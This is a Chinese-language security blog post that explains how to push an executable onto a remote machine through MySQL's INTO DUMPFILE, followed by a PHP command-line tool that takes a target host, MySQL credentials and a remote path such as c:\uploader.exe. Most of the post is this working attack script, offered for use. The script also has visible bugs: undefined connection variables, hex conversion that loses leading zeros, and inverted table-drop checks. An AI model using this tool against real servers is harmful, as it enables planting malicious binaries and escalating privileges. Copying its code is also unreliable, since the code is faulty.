MENU

Mysql uploader File

April 14, 2016 • Security

首先将EXE,也就是执行体,通过C32ASM,转换成16进制,然后通过MYSQL直接创建表,最后将16进制写入到表里,最后在into outfile即可。

(注意,MYSQL有限制,每次只能一次传文件不能大于63KB,所以如果大于63KB的文件,需要将文件分成多块的16进制,依次写入到一个新的EXE,最后在直接copy /b 1.exe+2.exe+3.exe c:Yes.exe即可)

<?php
function Upload_file($hostname,$username,$password,$dbname,$shellcoder,$writefilename)
{
    if ($link = mysql_connect($host,$user,$password))
    {
        echo "databases suscess\r\n";
    }else
    {
        die(mysql_error());
    }

    $conn=mysql_select_db($dbname,$link);
    if(!mysql_query('DROP TABLE Temp_udf'))
    {
        echo "[-]:drop tables not exists\r\n";
        exit();
    }

    $query=mysql_query('CREATE TABLE Temp_udf(udf BLOB);');
     
    if(!$query)
    {
        echo 'create tables Temp_udf error'.mysql_error();
    }else
    {
        $query="INSERT into Temp_udf values (CONVERT($shellcoder,CHAR));";
        if(!mysql_query($query))
        {
            echo '[-]:udf insert context error'.mysql_error();
        }else
        {
            $query="SELECT udf FROM Temp_udf INTO DUMPFILE '$writefilename'";
            if(!mysql_query($query))
            {
                echo 'udf dump context'.mysql_error();
            }else
            {
                mysql_query('DROP TABLE Temp_udf');
                echo '[-]:Drop table Temp_udf error\r\n';
            }  
        }
    }
}
$filename = @$argv[1];
$hostname = @$argv[2];
$username = @$argv[3];
$password = @$argv[4];
$dbname = @$argv[5];
$remotewritefile = @$argv[6];
if ($argc < 6)
{
    echo "[-]:$argv[0] pass.exe 192.168.1.1 root 123456 test c:\\uploader.exe\r\n";
    echo "[-]:$argv[0] pass.exe remote_Host mysql_user mysql_password mysql_db uploader_Path\r\n";
    exit();
}
if(!file_exists($filename))
{
    echo "[-]:Error->$filename not exists";
    exit();
}

$fp = fopen($filename, "rb");
if ($fp == NULL)
{
    echo "Filename.$filename reader error.\r\n";
    fclose($fp);
    exit();
}

$fwritecode = fopen("shellcode.txt","a+");
if($fwritecode == NULL)
{
    echo "Fwrite shellcode error.\r\n";
    fclose($fwritecode);
    exit();
}

$filesz = filesize($filename);
if($filesz > 60000)
{
    echo "Filename:$filename size errors.\r\n";
    echo "Filename: $filename Cannot be greater than 60KB.\r\n";
    exit(1);
}

echo "Filename $filename readers context sucessfuly\r\n";
 
while(!feof($fp))
{
    $str = fgets($fp,strlen($fp));
    for($i=0;$i<=strlen($str);$i++)
    {
        $asc = ord(substr($str,$i,1));
        $hex .= dechex($asc);
    }
}

$shellcode = "0x".$hex;

fwrite($fwritecode,$shellcode);
fclose($fp);
fclose($fwritecode);
Upload_file($hostname,$username,$password,$dbname,$shellcode,$remotewritefile);

?>

711784-20160414221459457-811157666.png

test.zip

参考:

http://www.cnblogs.com/killbit/p/5393301.html

Archives QR Code
QR Code for this page
Tipping QR Code